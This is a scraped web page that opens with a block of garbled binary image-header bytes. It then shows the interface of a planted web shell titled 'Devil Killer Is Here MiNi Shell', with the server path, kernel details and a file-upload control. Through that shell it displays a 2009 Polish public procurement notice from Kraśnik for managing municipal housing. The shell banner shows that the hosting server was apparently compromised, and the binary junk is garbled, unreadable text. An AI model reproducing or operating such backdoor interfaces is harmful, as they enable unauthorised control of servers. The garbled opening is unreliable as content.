JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091006/170011-N-2009.html

<p class="kh_header"><b>Kraśnik: Zarządzanie budynkami i lokalami stanowiącymi mieszkaniowy
i użytkowy zasób Miasta Kraśnik</b><br>
<b>Numer ogłoszenia: 170011 - 2009; data zamieszczenia: 06.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie budynkami i lokalami stanowiącymi mieszkaniowy
i użytkowy zasób Miasta Kraśnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia pn.: Zarządzanie budynkami i lokalami stanowiącymi mieszkaniowy i użytkowy zasób  Miasta Kraśnik jest usługa polegająca na zarządzaniu w imieniu Miasta Kraśnik:
a budynkami mieszkalnymi stanowiącymi własność Miasta Kraśnik,
b budynkami socjalnymi stanowiącymi własność Miasta Kraśnik lub będącymi 
w samoistnym posiadaniu Miasta Kraśnik,
c lokalami mieszkalnymi będącymi własnością Miasta Kraśnik znajdującymi się 
w  budynkach wspólnot mieszkaniowych,
d lokalami użytkowymi stanowiącymi własność Miasta Kraśnik znajdującymi się 
w  budynkach wspólnot mieszkaniowych,
e budynkami użytkowymi stanowiącymi własność Miasta Kraśnik
f lokalami niezagospodarowanymi stanowiącymi własność Miasta Kraśnik pustostany

Zarządzanie budynkami i lokalami polegać będzie na podejmowaniu wszelkich decyzji 
i wykonywaniu wszelkich czynności zmierzających do utrzymywania mieszkaniowych 
i użytkowych zasobów Zamawiającego w stanie niepogorszonym zgodnie z ich przeznaczeniem jak również uzasadnionego inwestowania w nieruchomość. W skład zasobu objętego przedmiotem zamówienia wchodzą: budynki wraz z lokalami mieszkalnymi i użytkowymi stanowiące własność Miasta Kraśnik lub będące w jej posiadaniu oraz lokale mieszkalne i użytkowe stanowiące własność Miasta Kraśnik we wspólnotach mieszkaniowych. Szczegółowy wykaz ze wskazaniem adresów i powierzchni został przedstawiony w załączniku nr 1-1f do SIWZ.

W ramach czynności zarządzania budynkami i lokalami Wykonawca zobowiązany będzie
 w szczególności do:
1.	Zawierania w imieniu i na rzecz Zamawiającego umów najmu dzierżawy na lokale mieszkalne, socjalne i użytkowe, na warunkach przez niego określonych i zaakceptowanych.
2.	Rozwiązywania umów najmu dzierżawy lokali mieszkalnych, socjalnych i użytkowych 
w przypadkach określonych w umowach najmu dzierżawy oraz w obowiązujących w tym zakresie przepisach prawa. O fakcie skutecznego rozwiązania umowy najmu/dzierżawy Wykonawca informuje  niezwłocznie Zamawiającego.
3.	Windykacji należności czynszowych i innych opłat związanych z najmem/dzierżawą  lokali 
(w zakresie udzielonego pełnomocnictwa).
4.	Dokonywania zmian zawartych umów najmu dzierżawy lokali mieszkalnych, socjalnych 
i użytkowych w zakresie czynszu oraz opłat niezależnych na zasadach określonych przez Zamawiającego oraz w zakresie innych opłat, gdy wynika to z właściwych przepisów.
5.	Prowadzenia pełnej ewidencji kosztowej w zakresie pobierania czynszu za lokale mieszkalne, socjalne i użytkowe w imieniu i na rzecz Zamawiającego. Dokonywanie rozliczeń opłat na pokrycie kosztów wynikających z najmu wnoszonych w formie zaliczek np. na dostawę zimnej wody i odprowadzanie ścieków, dostawę c.o. itp. w przyjętych okresach rozliczeniowych.
6.	Zawierania w imieniu Zamawiającego pisemnych umów w zakresie wprowadzonych ulepszeń lokalu oraz rozliczeń z tego tytułu.
7.	Zawiadamiania Zamawiającego o lokalach mieszkalnych, socjalnych i użytkowych zwolnionych w wyniku rozwiązania umowy z najemcą dzierżawcą.
8.	Przejmowania w imieniu Zamawiającego zwalnianych przez użytkowników lokali protokołem zdawczo-odbiorczym oraz dozorowania zwolnionych lokali mieszkalnych, socjalnych  
i użytkowych przechowywania kluczy, udostępniania lokali do obejrzenia osobom zainteresowanym zawarciem umowy najmu dzierżawy i zabezpieczenia lokali przed uszkodzeniem lub zniszczeniem.
9.	Wyrażania zgody na podnajem lokali użytkowych oraz ponowne zawieranie umów w przypadku wypowiedzenia umów najmu dzierżawy z powodu zadłużenia czynszowego po spłacie zaległości, po uprzednim powiadomieniu Zamawiającego.
10.	Organizowania przetargów na dzierżawę lokali użytkowych.
11.	Zawierania i rozwiązywania umów najmudzierżawy lokali użytkowych z naliczeniem następujących opłat:
- czynszu najmu dzierżawy w wysokości ustalonej przez Miasto Kraśnik bądź ustalonej 
w wyniku przetargu,
- mediów w przypadku gdy najemca/dzierżawca nie podpisał indywidualnej 
  umowy z ich dostawca.
12.	Zawierania umów na dostawę mediów do budynków wody, energii elektrycznej, cieplnej, gazu oraz odprowadzanie ścieków i odbiór nieczystości stałych z wyjątkiem najemcówdzierżawców lokali użytkowych zobowiązanych w umowach do zawarcia indywidualnych umów na dostawę mediów.
13.	Prowadzenia dla każdego lokalu mieszkalnego i użytkowego, pełnej dokumentacji 
i korespondencji związanej z najmem/dzierżawą.
14.	Prowadzenia bieżącej ewidencji osób zamieszkałych w lokalach mieszkalnych i socjalnych.
15.	Prowadzenia zbiorczej ewidencji przychodów i kosztów dla budynków i lokali znajdujących się 
w danym budynku oraz bieżąca analiza kosztów ich utrzymania.
16.	Potwierdzania najemcom wniosków o przyznanie dodatków mieszkaniowych oraz zawiadamiania o wystąpieniu zaległości w opłatach.
17.	Przechowywania i archiwizowania wszelkich źródłowych dokumentów dotyczących budynków 
i lokali w tym dokumentacji  remontowej, finansowo-księgowej, zgodnie z obowiązującymi przepisami.
18.	Prowadzenia ksiąg obiektów budowlanych oraz dokumentacji technicznej budynków wymaganej przez przepisy prawa budowlanego.
19.	Prowadzenia dokumentacji dot. powierzonych nieruchomości w zakresie: opinii i pozwoleń wymaganych odrębnymi przepisami, dokumentacji prawnej np. uchwały Wspólnot Mieszkaniowych, dokumenty sądoweprocesowe, umów z kontrahentami banki, dostawcy mediów, ubezpieczyciel, wykonawcy remontów, umów na pożytki np. reklamy.
20.	Zapewnienia sprawnego działania istniejących instalacji i urządzeń związanych z powierzonymi budynkami i lokalami, umożliwiających użytkownikom lokali korzystanie z oświetlenia, wody, gazu i innych urządzeń technicznych /w tym instalacji wentylacyjnych i przewodów kominowych/.
21.	Zlecania, w zakresie:
- okresowych kontroli, przeglądów technicznych powierzonych  budynków 
i lokali, w tym urządzeń stanowiących ich wyposażenie techniczne /kontrole stanu technicznego instalacji elektrycznych, piorunochronnych, gazowych/, zgodnie z wymogami ustawy Prawo budowlane oraz niezwłoczne wykonywanie zaleceń pokontrolnych;
-  okresowych kontroli stanu technicznego przewodów kominowych /dymowych,   spalinowych, wentylacyjnych/ wraz z zapewnieniem usług kominiarskich oraz wykonywanie zaleceń pokontrolnych;
- zapewnienie innych usług związanych z funkcjonowaniem urządzeń technicznych budynków  lokali zgodnie z wymogami ustawy Prawo budowlane oraz niezwłoczne wykonywanie zaleceń pokontrolnych.
22.	 Wykonawca związany będzie ustaleniami objętymi zakresem bieżących umów na świadczenie usług, zawartymi w imieniu Zamawiającego
23.	Zabezpieczenia utrzymania w należytym stanie porządku i czystości budynków, ich części 
i urządzeń oraz terenów bezpośrednio przylegających, jeżeli obowiązek taki wynika z zawartych umów bądź przepisów prawa.
24.	Zapewnienia dostaw do powierzonych budynków energii elektrycznej, wody, energii cieplnej oraz usług o odprowadzanie nieczystości stałych i płynnych oraz innych usług niezbędnych do prawidłowego funkcjonowania nieruchomości.
25.	Zapewnienia poszczególnym lokalom znajdującym się w powierzonych budynkach, dostaw wody, energii cieplnej oraz wywozu nieczystości stałych i płynnych, jeżeli obowiązek taki wynika z umów najmu zawartych przez Zamawiającego.
26.	Ubezpieczenia w imieniu i na rzecz Zamawiającego budynków objętych niniejszą umową.
27.	Udostępniania Zamawiającemu, w związku z przysługującym mu prawem kontroli czynności zarządzania, wszelkich informacji i dokumentów dotyczących powierzonych w zarządzanie budynków i lokali oraz sporządzania dodatkowych sprawozdań i zestawień.
28.	Nadzorowania i egzekwowania /w stosownym trybie/, prawidłowości wykonania zawartych 
z osobami trzecimi umów. Wykonawca nie może bez zgody Zamawiającego przenieść obowiązków wynikających z niniejszej umowy na osoby trzecie.
29.	Bieżącego informowania Zamawiającego o aktualnym stanie zadłużenia lokali i ich stanie technicznym.
30.	Sporządzania w oparciu o kontrole stanu technicznego budynków i lokali zestawień, potrzeb remontowych wraz z opinią Wykonawcy i kosztem ich wykonania i ich przedkładanie Zamawiającemu w określonych przez niego terminach. Zatwierdzone przez Zamawiającego potrzeby remontowe wraz z zaakceptowanym kosztem ich wykonania wiążą Wykonawcę 
i przekroczenie zaplanowanych wydatków bez zgody Zamawiającego obciąża Wykonawcę.
31.	Sporządzania w oparciu o kontrole stanu technicznego budynków i lokali rocznych planów remontów wraz z ich szacunkowym kosztem i przekazanie Zamawiającemu do dnia 15 września każdego roku.
32.	Potwierdzania wysokości kwot za dostarczone media, przypadających na budynki i lokale Zamawiającego, wg wskazań urządzeń pomiarowych /woda, ścieki/, ilości zamieszkałych osób /śmieci/ lub m2 pow. użytkowej lokalu /energia cieplna/.
33.	Zawiadamiania Zamawiającego o konieczności przeprowadzenia remontu budynków i lokali 
w zakresie nieobjętym planem remontowym lub modernizacyjnym, w tym także 
o przekazywanych bezpośrednio do Wykonawcy zasadnych wniosków zgłoszeń od najemców lokali. Informacje te winny zawierać opinie i uzasadnienie Wykonawcy.
34.	Będące przedmiotem zamówienia zadania z zakresu zarządzania dotyczące obsługi budynków 
i lokali Miasta Kraśnik w tych budynkach obejmują czynności prawne, obsługę administracyjną budynków, lokali i najemców, obsługę finansowo-księgową budynków i lokali, techniczną obsługę obiektów i zasobów lokalowych, roboty konserwacyjne oraz pogotowie techniczne, które szczegółowo przedstawione zostały w załączniku nr 2 do SIWZ.
35.	Wykonawca wykonywać będzie czynności zarządzania budynkami i lokalami w imieniu i na rachunek Zamawiającego.
36.	Wykonawca obowiązany będzie na żądanie Zamawiającego bez uprzedniego uprzedzenia poddać się kontroli w zakresie zarządzania powierzonym mieniem oraz przekazywać informacje o aktualnym stanie zadłużenia najemców.

Uwaga! Wykonawca przy realizacji zamówienia nie może korzystać z pomocy podwykonawców..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.33.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości:
8 000 zł (słownie: osiem tysięcy złotych), które może być wnoszone w:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
-	poręczeniach i gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. z 2007r. Nr 42, poz. 275 z późn. zm.)
2.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy Ziemi Kraśnickiej w Kraśniku nr 10 8717 0009 2001 0000 0909 0013. 
3.	Jeżeli wadium zostanie wniesione w pieniądzu przelewem, wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. W tytule przelewu należy wpisać: wadium-Przetarg na: Zarządzanie budynkami i lokalami stanowiącymi mieszkaniowy i użytkowy zasób Miasta Kraśnik 
4.	Za wyjątkiem wadium wniesionego w pieniądzu, wymagane jest dołączenie do oferty oryginału  dokumentu wystawionego na rzecz zamawiającego. Dokumenty, o których mowa muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
5.	Wadium musi być wniesione przed upływem terminu składania ofert, tj. do 14.10.2009 r. do godz. 10:00 (liczy się data wpływu środków na rachunek bankowy Zamawiającego
6.	Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
7.	Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest niezgodna z rozdziałem X pkt 1 SIWZ - są wykluczeni.
8.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
-	upłynął termin związania ofertą,
-	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
-	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
9.	Z zastrzeżeniem pkt 9, Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
-	który wycofał ofertę przed upływem terminu składania ofert,
-	który został wykluczony z postępowania,
-	którego oferta została odrzucona.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych dokumentów, oświadczeń lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niezależnych od niego.
11.	Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
12.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
13.	Wykonawca traci wadium na rzecz zamawiającego, jeżeli:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniesie zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający następujące warunki:

1.	Posiadają uprawnienia do wykonania przedmiotu zamówienia.  
2.	Posiadają niezbędną wiedzę i doświadczenie (zarządzają lub zarządzali jednocześnie  budynkami lub lokalami o pow. co najmniej 40 000 m2 oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - posiadają biura zapewniające obsługę najemców w Dzielnicy Fabrycznej i Dzielnicy Starej - każdy o powierzchni użytkowej pozwalające na pełną obsługę najemców, bezpieczne przechowywanie i archiwizowanie dokumentacji finansowo-księgowej oraz technicznej, wyposażone w odpowiedni sprzęt komputerowy i oprogramowanie, pozwalające na automatyzację obsługi najemców/dzierżawców lokali mieszkalnych i użytkowych (od poniedziałku do piątku pomiędzy godz. 8.00 a godz. 16.00) i elektroniczne przesyłanie danych) oraz dysponują osobami zdolnymi do wykonania zamówienia (tj: z uprawnieniami budowlanymi w zakresie  konstrukcyjno-budowlanym, w branży  elektrycznej, osoby z wykształceniem prawniczym lub radcą prawnym, zarządcą nieruchomości oraz osobą z uprawnieniami księgowego) lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - posiadają ubezpieczenie OC w zakresie prowadzenia działalności gospodarczej obejmującej przedmiot zamówienia, na kwotę co najmniej 100 000 zł lub oświadczą, że w przypadku wygrania przetargu, przed podpisaniem umowy, przedłożą dokument potwierdzający posiadanie wymaganego ubezpieczenia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania powyższych warunków oparta będzie o zasadę spełnia - nie spełnia /1 - 0/ i zostanie przeprowadzona w oparciu o dokumenty złożone zgodnie z rozdziałem VIII SIWZ, zgodnie z poniższym opisem dokonania oceny ich spełniania.
Ad. 1. 
Na potwierdzenie spełnienia warunku posiadania uprawnień do wykonania zamówienia należy przedłożyć licencję zawodową zarządcy nieruchomości nadaną w trybie z art. 192 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami /t.j Dz. U. z 2004 r., Nr 261, poz. 2603 z późn. zmian./ oraz aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, oraz dokumenty określone w rozdziale IX pkt. 4, 5, 6.
Warunek zostanie uznany za spełniony, jeżeli wykonawca nie zalega z opłatami i podatkami lub uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego oraz nie figuruje w Krajowym Rejestrze Karnym.

Ad. 2.
Warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże się zrealizowaniem lub realizacją, co najmniej jednego zadania w zakresie jednoczesnego zarządzania budynkami lub lokalami o powierzchni nie mniejszej niż 40.000 m2 z podaniem dat wykonania 
i adresów Zamawiających  - załącznik nr 7 do SIWZ.

Na potwierdzenie warunku dysponowania osobami zdolnymi do wykonania zamówienia należy przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania zamówienia oraz zakresu wykonywanych przez nich czynności. Warunek zostanie uznany za spełniony, jeżeli Wykonawca dysponuje osobami: posiadającą uprawnienia budowlane w zakresie  konstrukcyjno-budowlanym, w branży  elektrycznej, osobą z wykształceniem prawniczym lub radcą prawnym, zarządcę nieruchomości oraz osobą z uprawnieniami księgowego - załącznik nr 6 do SIWZ.

Na potwierdzenie warunku dysponowania potencjałem technicznym należy złożyć 
oświadczenie - załącznik nr 4 do SIWZ.

Ad 3.
Ocena sytuacji finansowej zostanie dokonana w oparciu o aktualną polisę lub inny dokument ubezpieczenia w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca jest ubezpieczony na kwotę  nie mniejszą niż 100.000,00 zł, lub oświadczy, że w przypadku wygrania przetargu, przed podpisaniem umowy, przedłoży dokument potwierdzający posiadanie wymaganego ubezpieczenia.


Ad. 4 
Na potwierdzenie warunku nie wykluczenia wykonawcy z postępowania należy złożyć oświadczenie zgodnie z art. 44 ustawy - Prawo zamówień publicznych - załącznik nr 4 do SIWZ.


Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania.
Warunki udziału w postępowaniu oraz sposób oceny ich spełniania nie podlegają zmianom w toku danego postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dotyczy tylko podmiotów zbiorowych.
7.	Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania,
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie jednoczesnego zarządzania budynkami lub lokalami o powierzchni nie mniejszej niż 40.000 m2, z podaniem powierzchni zarządzania,  dat wykonania i odbiorców - zał. Nr 7 do SIWZ.
8.	Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia stwierdzające wymagane przez Zamawiającego uprawnienia (uprawnienia budowlane w branży konstrukcyjno-budowlanej, elektrycznej, radca prawny lub osoby z wykształceniem prawniczym, osoby z uprawnieniami księgowego, zarządca nieruchomości) wg wzoru stanowiącego załącznik nr 6 do SIWZ.
9.	Aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę nie mniejszą niż 100.000 zł, lub oświadczenie, że Wykonawca 
w przypadku wygrania przetargu, przed podpisaniem umowy, przedłoży dokument potwierdzający posiadanie wymaganego ubezpieczenia.
10.	Licencja zarządcy nieruchomości. 

Brak jakiegokolwiek z wyżej wymienionych dokumentów, lub złożenie dokumentu w niewłaściwej formie (np. bez podpisu), spowoduje odrzucenie oferty.
Dokumenty mogą być przedstawione pisemnie w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę /na każdej zapisanej stronie/ 
Zamawiający wyklucza z postępowania wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lublin.pl/miastokrasnik/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
